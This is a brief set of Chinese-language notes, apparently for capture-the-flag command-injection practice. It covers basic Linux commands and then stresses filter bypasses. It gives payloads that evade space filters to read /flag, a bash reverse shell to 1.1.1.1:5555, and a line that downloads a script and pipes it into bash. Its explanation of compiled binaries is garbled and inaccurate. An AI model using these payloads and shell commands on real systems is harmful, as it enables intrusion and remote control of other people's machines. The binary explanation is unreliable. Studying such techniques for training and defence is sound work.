大佬:
命令执行: |
Linux cut命令
Linux cut命令用于显示每行从开头算起 num1 到 num2 的文字。
whereis命令
whereis命令用来定位指令的二进制程序、源代码文件和man手册页等相关文件的路径。
只能找二进制文件!啥意思呢?二进制文件就是编译后的程序文件!
如:helloword.c 编译后 helloword.exe
helloword.exe就是二进制文件!
helloword.exe手动点击就安装了!但是在linux下要用yum安装!
https://coomrade.github.io/2018/09/12/time-base-order-injection/
https://xzfile.aliyuncs.com/media/upload/picture/20190120174912-a3cd3eba-1c98-1.png)
bypass@@重点
前面都是些基础的命令!后面的bypass是重点!
空格绕过
- 使用
<
或者<>
$ cat</flag |
- 使用
IFS
或者
Copy$ cat$IFS$9/flag |
大概Bypass一些命令注入限制的姿势里面都要!!!
反弹shell:
服务器下放个:
bash -c “bash -i >&/dev/tcp/1.1.1.1/5555 0>&1”
直接 curl 1.1.1.1|bash